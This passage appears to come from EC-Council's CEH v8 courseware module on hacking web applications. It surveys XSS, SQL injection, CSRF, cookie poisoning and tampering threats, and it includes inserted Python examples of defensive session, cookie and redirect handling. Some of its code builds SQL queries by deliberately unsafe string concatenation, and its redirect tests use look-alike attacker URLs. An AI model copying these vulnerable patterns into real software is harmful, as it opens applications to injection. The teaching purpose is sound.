Hacking Web Applications. Module 13


Hacking Web Applications
Module 13

Ethical Hacking and Countermeasures v8
Module 13: Hacking Web Applications
Engineered by Hackers. Presented by Professionals.
CEH

Module 13 Page 1724 Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Security News

XSS Attacks Lead Pack As Most Frequent Attack Type

Source: http://www.darkreading.com

Secure cloud hosting company, FireHost, has today announced the findings of its latest web application attack report, which provides statistical analysis of the 15 million cyber-attacks blocked by its servers in the US and Europe during Q3. The report looks at attacks on the web applications, databases and websites of FireHost's customers between July and September, and offers an impression of the current internet security climate as a whole.

Amongst the cyber-attacks registered in the report, FireHost categorises four attack types in particular as representing the most serious threat. These attack types are among FireHost's 'Superfecta' and they consist of Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF). One of the most significant changes in attack traffic seen by FireHost between Q2 and Q3 was a considerable rise in the number of cross-site attacks, in particular XSS and CSRF attacks rose to represent 64% of the group in the third quarter (a 28% increased penetration). XSS is now the most common attack type in the Superfecta, with CSRF now in second. FireHost's servers blocked more than one million XSS attacks during this period alone, a figure which rose 69%, from 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on the Superfecta at 843,517.

Cross-site attacks are dependent upon the trust developed between site and user. XSS attacks involve a web application gathering malicious data from a user via a trusted site (often coming in the form of a hyperlink containing malicious content), whereas CSRF attacks exploit the trust that a site has for a particular user instead. These malicious security exploits can also be used to steal sensitive information such as user names, passwords and credit card details - without the site or user's knowledge. The severity of these attacks is dependent on the sensitivity of the data handled by the vulnerable site and this ranges from personal data found on social networking sites, to the financial and confidential details entered on ecommerce sites amongst others. A great number of organisations have fallen victim to such attacks in recent years including attacks on PayPal, Hotmail and eBay, the latter falling victim to a single CSRF attack in 2008 which targeted 18 million users of its Korean website. Furthermore in September this year, IT giants Microsoft and Google Chrome both ran extensive patches targeted at securing XSS flaws, highlighting the prevalence of this growing online threat.

"Cross-site attacks are a severe threat to business operations, especially if servers aren't properly prepared," said Chris Hinkley, CISSP - a Senior Security Engineer at FireHost. "It's vital that any site dealing with confidential or private user data takes the necessary precautions to ensure applications remain protected. Locating and fixing any website vulnerabilities and flaws is a key step in ensuring your business and your customers don't fall victim to an attack of this nature. The consequences of which can be significant, in terms of both financial and reputational damage."

The Superfecta attack traffic for Q3 can be broken down as follows:

As with Q2 2012, the majority of attacks FireHost blocked during the third calendar quarter of 2012 originated in the United States (11 million / 74%). There has however, been a great shift in the number of attacks originating from Europe this quarter, as 17% of all malicious attack traffic seen by FireHost came from this region. Europe overtook Southern Asia (which was responsible for 6%), to become the second most likely origin of malicious traffic.

Varied trends among the Superfecta attack techniques are demonstrated between this quarter and last:

During the build up to the holiday season, ecommerce activity ramps up dramatically and cyber-attacks that target website users' confidential data are also likely to increase as a result. As well as cross-site attacks, the other Superfecta attack types, SQL Injection and Directory Traversal, still remain a significant threat despite a slight reduction in frequency this quarter. Ecommerce businesses need to be aware of the risks that this period may present to their security, as Todd Gleason, Director of Technology at FireHost explains, "You'd better believe that hackers will try and take advantage of any surges in holiday shopping. They will be devising a number of ways they can take advantage of any web application vulnerabilities and will use an assortment of different attack types and techniques to do so. When it's a matter of confidential data at risk, including customer's financial information - credit card and debit card details - there's no room for complacency. These organisations need to know that there's an increased likelihood of attack during this time and it's their responsibility to take the necessary steps to stop such attacks."

Copyright 2013 UBM Tech, All rights reserved

http://www.darkreading.com/security/news/ /firehost-q3-web-application-report-xss-attacks-lead-pack-as-most-frequent-attack-type.html

Module Objectives

The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications. The attacks exploiting these vulnerabilities are also highlighted. The module starts with a detailed description of web applications. Various web application threats are mentioned. The hacking methodology reveals the various steps involved in a planned attack. The various tools that attackers use are discussed to explain the way they exploit vulnerabilities in web applications. The countermeasures that can be taken to thwart any such attacks are also highlighted. Security tools that help network administrators to monitor and manage the web application are described. Finally, web application pen testing is discussed.

This module familiarizes you with:

How Web Applications Work
Web Attack Vectors
Web Application Threats
Web App Hacking Methodology
Footprint Web Infrastructure
Hacking Webservers
Analyze Web Applications
Attack Authentication Mechanisms
Attack Authorization Schemes
Session Management Attack
Attack Data Connectivity
Attack Web App Client
Attack Web Services
Web Application Hacking Tools
Countermeasures
Web Application Security Tools
Web Application Firewall
Web Application Pen Testing

Module Flow

Web applications are the application programs accessed only with an Internet connection enabled. These applications use HTTP as their primary communication protocol. Generally, attackers target these apps for several reasons. They are exposed to various attacks. For a clear understanding of "hacking web applications," we divided the concept into various sections:

Web App Concepts
Web App Threats
Hacking Methodology
Web Application Hacking Tools
Countermeasures
Security Tools
Web App Pen Testing

Let us begin with the Web App concepts.

This section introduces you to the web application and its components, explains how the web application works, and its architecture. It provides insight into Web 2.0 applications, vulnerability stacks, and web attack vectors.

Web Application Security Statistics

Source: https://www.whitehatsec.com

According to the WhiteHat Security website statistics report in 2012, it is clear that cross-site scripting vulnerabilities are found on more web applications when compared to other vulnerabilities. From the graph you can observe that in the year 2012, cross-site scripting vulnerabilities are the most common vulnerabilities, found in 55% of the web applications. Only 10% of web application attacks are based on insufficient session expiration vulnerabilities. In order to minimize the risks associated with cross-site scripting vulnerabilities in web applications, you have to adopt the necessary countermeasures against them.

Figure 13.1: WhiteHat Security Website Statistics Report, 2012. Vulnerability classes charted: Cross-Site Scripting, Information Leakage, Content Spoofing, Insufficient Authorization, Cross-Site Request Forgery, Brute Force, Predictable Resource Location, SQL Injection, Session Fixation, Insufficient Session Expiration.

Introduction to Web Applications

Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser. Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency. New web technologies such as Web 2.0 provide more attack surface for web application exploitation.

Web applications are the applications that run on the remote web server and send the output over the Internet. Web 2.0 technologies are used by all the applications based on web-based servers for purposes such as communication with users, clients, third-party users, etc. A web application is comprised of many layers of functionality. However, it is considered a three-layered architecture consisting of presentation, logic, and data layers. The web architecture relies substantially on the technology popularized by the World Wide Web, Hypertext Markup Language (HTML), and the primary transport medium, e.g. Hyper Text Transfer Protocol (HTTP).

HTTP is the medium of communication between the server and the client. Typically, it operates over TCP port 80, but it may also communicate over an unused port. Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser. Some of the popular web servers present today are Microsoft IIS, Apache Software Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun One. Resources are called Uniform Resource Identifiers (URIs), and they may either be static pages or contain dynamic content. Since HTTP is stateless, i.e., the protocol does not maintain a session state, the requests for resources are treated as separate and unique. Thus, the integrity of a link is not maintained with the client. Cookies can be used as tokens, which servers hand over to clients to allow access to websites. However, cookies are not perfect from a security point of view because they can be copied and stored on the client's local hard disk, so that users do not have to request a token for each query.

Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on web applications and Web 2.0 technologies to support key business processes and improve performance. New web technologies such as Web 2.0 provide more attack surface for web application exploitation. Attackers use different types of vulnerabilities that can be discovered in web applications and exploit them to compromise web applications. Attackers also use tools to launch attacks on web applications.

Web Application Components

The components of web applications are listed as follows:

Login: Most websites allow authentic users to access the application by means of a login. It means that to access the service or content offered by the web application, the user needs to submit his/her username and password. Example: gmail.com

The Web Server: It refers to either software or hardware intended to deliver web content that can be accessed through the Internet. An example is the web pages served to the web browser by the web server.

Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) information.

User Permissions: When you are not allowed to access the specified web page in which you are logged in with user permissions, you may be redirected again to the login page or to any other page.

The Application Content: It is an interactive program that accepts web requests by clients and uses the parameters that are sent by the web browser for carrying out certain functions.

Data Access: Usually the web pages will be contacting each other via a data access library in which all the database details are stored.

The Data Store: It is a way to the important data that is shared and synchronized between the children/threats. This stored information is quite important and necessary for higher levels of the application framework. It is not mandatory that the data store and the web server are on the same network. They can be in contact or accessible with each other through the network connection.

Role-level System Security

Application Logic: Usually web applications are divided into tiers, of which the application logic is the middle tier. It receives the request from the web browser and services it accordingly. The services offered by the application logic include asking questions and giving the latest updates against the database as well as generating a user interface.

Logout: An individual can shut down or log out of the web application or browser so that the session and the application associated with it end. The application ends either by the application logic taking the initiative or by automatically ending when the servlet session times out.
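The cookie-as-token mechanism, idle timeout and explicit logout described above (HTTP being stateless, tokens handed to the client, copied cookies), as an added example that is not part of the module; the store, the SESSIONID cookie name and the 15-minute timeout are assumptions:

```python
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Optional

IDLE_TIMEOUT_SECONDS = 15 * 60  # assumed value; tune per application


@dataclass
class Session:
    user: str
    created: float
    last_seen: float


class SessionStore:
    """HTTP is stateless, so the state lives here, keyed by an unguessable
    token.  The browser only ever holds the token, never the user data."""

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._clock = clock   # injectable so expiry can be exercised in a test
        self._sessions = {}   # token -> Session

    def login(self, user: str) -> str:
        token = secrets.token_urlsafe(32)  # 256 random bits, not guessable
        now = self._clock()
        self._sessions[token] = Session(user, now, now)
        return token

    @staticmethod
    def set_cookie_header(token: str) -> str:
        """Attributes that limit what a copied cookie is worth: HttpOnly keeps
        page script from reading it, Secure keeps it off plain HTTP, SameSite
        keeps it off cross-site requests, Max-Age bounds the on-disk copy."""
        return (f"Set-Cookie: SESSIONID={token}; Path=/; HttpOnly; Secure; "
                f"SameSite=Strict; Max-Age={IDLE_TIMEOUT_SECONDS}")

    def resolve(self, token: Optional[str]) -> Optional[str]:
        """Map a presented token back to a user, or None.  Expiry is enforced
        on the server, so a token lifted from a client's disk after the idle
        timeout is worthless even if the browser would still send it."""
        if not token:
            return None
        session = self._sessions.get(token)
        if session is None:
            return None
        now = self._clock()
        if now - session.last_seen > IDLE_TIMEOUT_SECONDS:
            del self._sessions[token]
            return None
        session.last_seen = now
        return session.user

    def logout(self, token: str) -> None:
        """Explicit logout ends the session on the server side at once."""
        self._sessions.pop(token, None)


def parse_cookie_header(header: str) -> Optional[str]:
    """Pull SESSIONID out of a request's Cookie header value."""
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "SESSIONID" and value:
            return value
    return None


if __name__ == "__main__":
    store = SessionStore()
    token = store.login("alice")
    print(store.set_cookie_header(token))
    print(store.resolve(parse_cookie_header(f"theme=dark; SESSIONID={token}")))
```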

How Web Applications Work

Slide: a browser requests news item ID 6329 (Topic: Tech, News: CNN); the application runs SELECT * from news where id = 6329 and returns the output.

Whenever someone clicks or types in the browser, immediately the requested website or content is displayed on the screen of the computer, but what is the mechanism behind this? This is the step-by-step process that takes place once a user sends a request for particular content or a website where multiple computers are involved. The web application model is explained in three layers. The first layer deals with the user input through a web browser or user interface. The second layer contains JSP (Java servlets) or ASP (Active Server Pages), the dynamic content generation technology tools, and the last layer contains the database for storing customer data such as user names and passwords, credit card details, etc. or other related information.

Let's see how the user triggers the initial request through the browser to the web application server:

First the user types the website name or URL in the browser and the request is sent to the web server. On receiving the request, the web server checks the file extension:

If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.

If the user requests a web page with the extension CFM, CFML, or CFC, then the request must be processed by the web application server. Therefore, the web server passes the user's request to the web application server. The user's request is now processed by the web application server. In order to process the user's request, the web server accesses the database placed at the third layer to perform the requested task by updating or retrieving the information stored on the database. Once done processing the request, the web application server sends the results to the web server, which in turn sends the results to the user's browser.

Figure: Working of Web Application (User, Login Form, Internet, Firewall, Web Server)
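The three-layer request flow just described (web server routing on extension, application server, database running the slide's SELECT * from news where id = 6329), as an added example that is not part of the module; it uses Python's sqlite3 as the database layer, the news rows and static file are constructed, and it contrasts a concatenated query with a validated, parameterized one to show why the parameter is the attack surface:

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit


# Layer 3: the database.  The 'news' table and its rows are constructed
# sample data; 6329/Tech/CNN is the row shown on the module's slide.
def build_database() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, topic TEXT, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [
            (6329, "Tech", "CNN"),
            (6330, "Sports", "Match report"),
            (6331, "Internal", "Unpublished draft"),
        ],
    )
    return conn


# Layer 2: the application server, with two versions of the same lookup.
def fetch_news_unsafe(conn: sqlite3.Connection, raw_id: str) -> list:
    """Assembles 'SELECT * from news where id = 6329' by concatenating the
    request parameter.  Anything that is not a bare integer becomes part of
    the SQL itself: the parameter-manipulation problem in one line."""
    return conn.execute("SELECT * FROM news WHERE id = " + raw_id).fetchall()


def fetch_news(conn: sqlite3.Connection, raw_id: str) -> list:
    """Hardened lookup: validate on the server (client-side checks can be
    bypassed) and bind the value as a query parameter so it is only ever data."""
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT * FROM news WHERE id = ?", (int(raw_id),)).fetchall()


# Layer 1: the web server, which routes on the file extension as described.
STATIC_FILES = {"/index.html": "<h1>Welcome</h1>"}  # constructed static content


def handle_request(conn: sqlite3.Connection, url: str) -> tuple:
    """Return (which tier answered, response body).  .htm/.html is served by
    the web server itself; .cfm/.cfml/.cfc is handed to the application
    server, which in turn reaches the database layer."""
    parts = urlsplit(url)
    if parts.path.endswith((".htm", ".html")):
        return ("web-server", STATIC_FILES.get(parts.path, "404 Not Found"))
    if parts.path.endswith((".cfm", ".cfml", ".cfc")):
        raw_id = parse_qs(parts.query).get("id", [""])[0]
        try:
            return ("app-server", fetch_news(conn, raw_id))
        except ValueError as exc:
            return ("app-server", f"400 Bad Request: {exc}")
    return ("web-server", "404 Not Found")


if __name__ == "__main__":
    db = build_database()
    print(handle_request(db, "/index.html"))
    print(handle_request(db, "/news.cfm?id=6329"))
```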

Web Application Architecture

All web applications execute with the help of the web browser as a supporting client. The web applications use a group of server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The information is presented by using the client-side script, and the hardware tasks such as storing and gathering required data are handled by the server-side script. In the following architecture, the clients use different devices, web browsers, and external web services with the Internet to get the application executed using different scripting languages. The data access is handled by the database layer using cloud services and a database server.

Figure: Web Application Architecture. Clients (smart phones, web appliance, web browser, external web services; presentation layer: Flash, Silverlight, JavaScript) connect over the Internet to the web server (firewall, HTTP request parser, proxy server, cache, servlet container, resource handler, authentication and login), which calls the business layer (application server: J2EE, .NET, COM, XCode, C++, COM+; business logic; legacy application; data access) and the database layer (cloud services, database server).

Web 2.0 Applications

Web 2.0 refers to a new generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration. It offers various features such as:

Advanced gaming
Dynamic as opposed to static site content
RSS-generated syndication
Social networking sites (Flickr, Facebook, del.icio.us)
Mash-ups (emails, IMs, electronic payment systems)
Wikis and other collaborative applications
Google Base and other free web services (Google Maps)
Ease of data creation, modification, or deletion by individual users
Online office software (Google Docs and Microsoft Light)
Interactive encyclopedias and dictionaries
Cloud computing websites such as Amazon.com
Frameworks (Yahoo! UI Library, jQuery)
Flash-rich interface websites
Mobile application (iPhone)
New technologies like AJAX (Gmail, YouTube)
Blogs (WordPress)

Vulnerability Stack

Web applications are maintained and accessed through various levels that include: custom web applications, third-party components, databases, web servers, operating systems, networks, and security. All the mechanisms or services employed at each level help the user in one way or the other to access the web application securely. When talking about web applications, security is a critical component to be considered because web applications are a major source of attacks. The following vulnerability stack shows the levels and the corresponding element/mechanism/service employed at each level that makes the web applications vulnerable:

Custom Web Applications: Business Logic Flaws, Technical Vulnerabilities
Third Party Components: Open Source / Commercial
Database: Oracle / MySQL / MS SQL
Web Server: Apache / Microsoft IIS
Operating System: Windows / Linux / OS X
Network: Router / Switch
Security: IPS / IDS

Figure: Vulnerability Stack

Web Attack Vectors

An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome. Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting. Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack.

An attack vector is a method of entering into unauthorized systems to perform malicious attacks. Once the attacker gains access into the system or the network, he or she delivers an attack payload or causes a malicious outcome. No protection method is completely attack-proof as attack vectors keep changing and evolving with new technological changes. Examples of various types of attack vectors:

Parameter manipulation: Providing the wrong input value to the web services by the attacker and gaining control over the SQL, LDAP, XPATH, and shell commands. When the incorrect values are provided to the web services, then they become vulnerable and are easily attacked by web applications running with web services.

XML poisoning: Attackers provide manipulated XML documents that when executed can disturb the logic of the parsing method on the server. When huge XMLs are executed at the application layer, then they can easily be compromised by the attacker to launch his or her attack and gather information.

Client validation: Most client-side validation has to be supported by server-side authentication. The AJAX routines can be easily manipulated, which in turn makes a way for attackers to handle SQL injection, LDAP injection, etc. and negotiate the web application's key resources.

Server misconfiguration: The attacker exploits the vulnerabilities in the web servers and tries to break the validation methods to get access to the confidential data stored on the servers.

Web service routing issues: The SOAP messages are permitted to access different nodes on the Internet by the WS-Routers. The exploited intermediate nodes can give access to the SOAP messages that are communicated between two endpoints.

Cross-site scripting: Whenever any infected JavaScript code is executed, then the targeted browsers can be exploited to gather information by the attacker.

Module Flow

Web applications are targeted by attackers for various reasons. The first issue is that the quality of the source code, as related to security, is poor; another issue is an application with a "complex setup." Due to these loopholes, attackers can easily launch attacks by exploiting them. Now we will discuss the threats associated with web applications.

Module flow (slide): Web App Pen Testing; Web App Concepts; Security Tools; Web App Threats; Countermeasures; Hacking Methodology; Web Application Hacking Tools.

This section lists and explains the various web application threats such as parameter/form tampering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, improper error handling, etc.

Web Application Threats 1

Web application threats are not limited to attacks based on URL and port 80. Despite using ports, protocols, and the OSI layer, the integrity of mission-critical applications must be protected from possible future attacks. Vendors who want to protect their products' applications must be able to deal with all methods of attack. The various types of web application threats are as follows:

Cookie Poisoning: By changing the information inside the cookie, attackers bypass the authentication process, and once they gain control over the network, they can either modify the content, use the system for the malicious attack, or steal information from the user's system.

Directory Traversal: Attackers exploit HTTP by using directory traversal and are able to access restricted directories; they execute commands outside of the web server's root directory.

Unvalidated Input: In order to bypass the security system, attackers tamper with the HTTP requests, URL, headers, form fields, hidden fields, query strings, etc. Users' login IDs and other related data get stored in the cookies, and this becomes a source of attack for the intruders. Attackers gain access to the victim's system using the information present in cookies. Examples of attacks caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflows, etc.

Cross-site Scripting (XSS): An attacker bypasses the client's ID security mechanism and gains access privileges, and then injects malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.

Injection Flaws: Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.

SQL Injection: This is a type of attack where SQL commands are injected by the attacker via input data; the attacker can then tamper with the data.

Parameter/Form Tampering: This type of tampering attack is intended to manipulate the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. This information is actually stored in cookies, hidden form fields, or URL query strings, and is used to increase application functionality and control. Man in the middle is one of the examples of this type of attack. Attackers use tools like WebScarab and Paros Proxy for these attacks.

Denial-of-Service (DoS): A denial-of-service attack is an attacking method intended to terminate the operations of a website or a server and make it unavailable to intended users. For instance, a website related to a bank or email service is not able to function for a few hours to a few days. This results in loss of time and money.

Broken Access Control: Broken access control is a method used by attackers where a particular flaw has been identified related to the access control, where authentication is bypassed and the attacker compromises the network.

Cross-site Request Forgery: The cross-site request forgery method is a kind of attack where an authenticated user is made to perform certain tasks on the web application that an attacker chooses. For example, a user clicking on a particular link sent through an email or chat.

Information Leakage: Information leakage can cause great losses for a company. Hence, all sources such as systems or other network resources must be protected from information leakage by employing proper content filtering mechanisms.

Improper Error Handling: It is necessary to define how the system or network should behave when an error occurs. Otherwise, it may provide a chance for the attacker to break into the system. Improper error handling may lead to DoS attacks.

Log Tampering: Logs are maintained by web applications to track usage patterns such as user login credentials, admin login credentials, etc. Attackers usually inject, delete, or tamper with web application logs so that they can perform malicious actions or hide their identities.

Buffer Overflow: A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.

Broken Session Management: When security-sensitive credentials such as passwords and other useful material are not properly taken care of, these types of attacks occur. Attackers compromise the credentials through these security vulnerabilities.

Security Misconfiguration: Developers and network administrators should check that the entire stack is configured properly, or security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Missing patches, misconfigurations, use of default accounts, etc. can be detected with the help of automated scanners, and attackers exploit them to compromise web application security.

Broken Account Management: Even authentication schemes that are valid are weakened because of vulnerable account management functions, including account update, forgotten or lost password recovery or reset, password changes, and other similar functions.

Insecure Storage: Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information somewhere, possibly in a database or on a file system. If proper security is not maintained for these storage locations, the web application may be at risk, as attackers can access the storage and misuse the information stored. Insecure storage of keys, certificates, and passwords allows the attacker to gain access to the web application as a legitimate user.
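The cookie poisoning threat listed above can be detected on the server by binding the cookie body to a keyed MAC: a client that edits a field in its own cookie cannot recompute the tag, so verification fails. The following Python block is an added example written for this section, not code from the EC-Council module; the secret key, the payload fields and the poison_cookie test helper (which simulates a client editing its cookie) are all constructed for the illustration.

```python
import base64
import hashlib
import hmac
import json

# Assumption: a random secret that lives only on the server and is never sent to the client.
SECRET_KEY = b"constructed-demo-key-replace-with-os.urandom(32)"


def _encode(payload: dict) -> str:
    """Serialise the payload deterministically (sorted keys) and base64 it for the cookie."""
    return base64.urlsafe_b64encode(json.dumps(payload, sort_keys=True).encode()).decode()


def _mac(body: str, key: bytes) -> str:
    """HMAC-SHA256 over the encoded body, hex encoded."""
    return hmac.new(key, body.encode(), hashlib.sha256).hexdigest()


def sign_cookie(payload: dict, key: bytes = SECRET_KEY) -> str:
    """Produce a cookie value of the form '<body>.<tag>'."""
    body = _encode(payload)
    return f"{body}.{_mac(body, key)}"


def verify_cookie(cookie: str, key: bytes = SECRET_KEY):
    """Return the payload dict if the tag matches; None if the cookie is altered or malformed."""
    body, sep, tag = cookie.rpartition(".")
    if not sep or not tag.isascii():
        return None
    # Constant-time comparison so the check does not leak how many tag bytes matched.
    if not hmac.compare_digest(_mac(body, key), tag):
        return None
    return json.loads(base64.urlsafe_b64decode(body.encode()))


def poison_cookie(cookie: str, field: str, new_value) -> str:
    """Constructed test helper: rewrite one field in the body while keeping the old tag,
    which is exactly what a client editing its own cookie produces."""
    body, _, tag = cookie.rpartition(".")
    payload = json.loads(base64.urlsafe_b64decode(body.encode()))
    payload[field] = new_value
    return f"{_encode(payload)}.{tag}"


if __name__ == "__main__":
    cookie = sign_cookie({"user": "jason", "role": "user"})
    print("valid:", verify_cookie(cookie))
    print("poisoned:", verify_cookie(poison_cookie(cookie, "role", "admin")))
```

A rejected cookie should be treated as an unauthenticated request and logged; the MAC only proves integrity, so anything confidential still does not belong in the cookie body.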

Web Application Threats 2

Platform Exploits: Various web applications are built by using different platforms such as BEA WebLogic and ColdFusion. Each platform has various vulnerabilities and exploits associated with it.

Insecure Direct Object References: When various internal implementation objects such as a file, directory, database record, or key are exposed through a reference by a developer, an insecure direct object reference takes place. For example, where a bank account number is made a primary key, there is a good chance it can be compromised by the attacker based on such references.

Insecure Cryptographic Storage: When sensitive data has been stored in the database, it has to be properly encrypted using cryptography. A few cryptographic encryption methods developed by developers are not up to par. Cryptographically very strong encryption methods have to be used. At the same time, care must be taken in storing the cryptographic keys. If these keys are stored in insecure places, the attacker can obtain them easily and decrypt the sensitive data.

Authentication Hijacking: In order to identify the user, every web application uses user identification such as a user ID and password. Once the attacker compromises the system, various malicious things like theft of services, session hijacking, and user impersonation can occur.

Network Access Attacks: Network access attacks can majorly impact web applications. These can have an effect on the basic level of services within an application and can allow access that standard HTTP application methods would not have access to.

Cookie Snooping: Attackers use cookie snooping on a victim's system to analyze their surfing habits and sell that information to other attackers, or may use this information to launch various attacks on the victim's web applications.

Web Services Attacks: Web services are process-to-process communications that have special security issues and needs. An attacker injects a malicious script into a web service and is able to disclose and modify application data.

Insufficient Transport Layer Protection: SSL/TLS authentication should be used for authentication on websites, or the attacker can monitor network traffic to steal an authenticated user's session cookie. Various threats such as account theft, phishing attacks, and compromise of admin accounts may happen after systems are compromised.

Hidden Manipulation: These types of attacks are mostly used by attackers to compromise e-commerce websites. Attackers manipulate the hidden fields and change the data stored in them. Several online stores face this type of problem every day. Attackers can alter prices and conclude transactions with the prices of their choice.

DMZ Protocol Attacks: The DMZ (Demilitarized Zone) is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. An attacker who is able to compromise a system that allows other DMZ protocols has access to other DMZs and internal systems. This level of access can lead to:
- Compromise of the web application and data
- Defacement of websites
- Access to internal systems, including databases, backups, and source code

Unvalidated Redirects and Forwards: Attackers make a victim click an unvalidated link that appears to be a valid site. Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass, leading to:
- Session fixation attacks
- Security management exploits
- Failure to restrict URL access
- Malicious file execution

Failure to Restrict URL Access: An application often safeguards or protects sensitive functionality and prevents the display of links or URLs for protection. Attackers access those links or URLs directly and perform illegitimate operations.

Obfuscation Application: Attackers usually work hard at hiding their attacks and avoiding detection. Network and host intrusion detection systems (IDSs) are constantly looking for signs of well-known attacks, driving attackers to seek different ways to remain undetected. The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, or URL encoding. Unicode is a method of representing letters, numbers, and special characters so these characters can be displayed properly, regardless of the application or underlying platform in which they are used.

Security Management Exploits: Some attackers target security management systems, either on networks or on the application layer, in order to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.

Session Fixation Attack: In a session fixation attack, the attacker tricks or attracts the user into accessing a legitimate web server using an explicit session ID value.

Malicious File Execution: Malicious file execution vulnerabilities have been found in most applications. The cause of this vulnerability is unchecked input into the web server. Due to this unchecked input, the attackers' files are easily executed and processed on the web server. In addition, the attacker performs remote code execution, installs a rootkit remotely, and in at least some cases takes complete control over the systems.
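The "Unvalidated Redirects and Forwards" threat above is mitigated by validating the redirect target against the site's own hosts before issuing the redirect. The following Python block is an added example written for this section, not code from the EC-Council module; it assumes www.juggybank.com (the host used elsewhere in this module) is the application's only host, and it checks the resolved absolute URL rather than the raw string so that protocol-relative, userinfo and look-alike-host forms are all caught.

```python
from urllib.parse import urljoin, urlsplit

# Assumption: the application's own host names; any other destination is external.
ALLOWED_HOSTS = {"www.juggybank.com"}
SITE_BASE = "https://www.juggybank.com/"


def safe_redirect_target(next_url: str, fallback: str = "/") -> str:
    """Return next_url only if it resolves to an allowed host; otherwise return fallback.

    Validation is done on the resolved absolute URL, so these all fall back:
      //evil.example/...                         (protocol-relative)
      https://www.juggybank.com@evil.example/    (userinfo before the real host)
      https://www.juggybank.com.evil.example/    (look-alike suffix)
      /\\evil.example                            (backslash that browsers read as a slash)
    """
    if not next_url:
        return fallback
    # Browsers treat a backslash like a slash in http(s) URLs, so normalise before resolving.
    candidate = next_url.replace("\\", "/")
    resolved = urljoin(SITE_BASE, candidate)
    parts = urlsplit(resolved)
    if parts.scheme not in ("http", "https"):
        return fallback
    # hostname is None for malformed URLs such as 'https:///x', which also falls back.
    if parts.hostname not in ALLOWED_HOSTS:
        return fallback
    return resolved


if __name__ == "__main__":
    for target in ["/account/summary", "//evil.example/login",
                   "https://www.juggybank.com.evil.example/", "/\\evil.example"]:
        print(f"{target!r:45} -> {safe_redirect_target(target)}")
```

An exact host-set comparison is used deliberately: prefix or substring checks on the URL string are what the userinfo and look-alike cases defeat.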

Unvalidated Input

Input validation flaws refer to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning.

An input validation flaw refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. Sites try to protect themselves from malicious attacks through input filtration, but there are various methods prevailing for the purpose of encoding. Many HTTP inputs have multiple formats that make filtering very difficult. The canonicalization method is used to simplify the encodings and is useful in avoiding various vulnerable attacks. Web applications that use only a client-side mechanism for input validation can easily be bypassed by attackers. In order to bypass the security system, attackers tamper with the HTTP requests, URLs, headers, form fields, hidden fields, and query strings. Users' login IDs and other related data get stored in the cookies, and this becomes a source of attack for intruders. Attackers gain access to the systems by using the information present in the cookies. Various methods used by hackers are SQL injection, cross-site scripting (XSS), buffer overflows, format string attacks, cookie poisoning, and hidden field manipulation, which result in data theft and system malfunctioning.

Figure: Unvalidated Input. The browser sends the POST request http://juggyboy.com/login.aspx?user=jason&pass=springfield; the browser input is not validated by the web application, and the query sent to the database is built directly from it:

string sql = "select * from Users where user='" + User.Text + "' and pwd='" + Password.Text + "'";

Parameter/Form Tampering

A web parameter tampering attack involves the manipulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, price, and quantity of products. A parameter tampering attack exploits vulnerabilities in integrity and logic validation mechanisms that may result in XSS, SQL injection, etc.

Parameter tampering is a simple form of attack aimed directly at the application's business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters.

Detailed Description

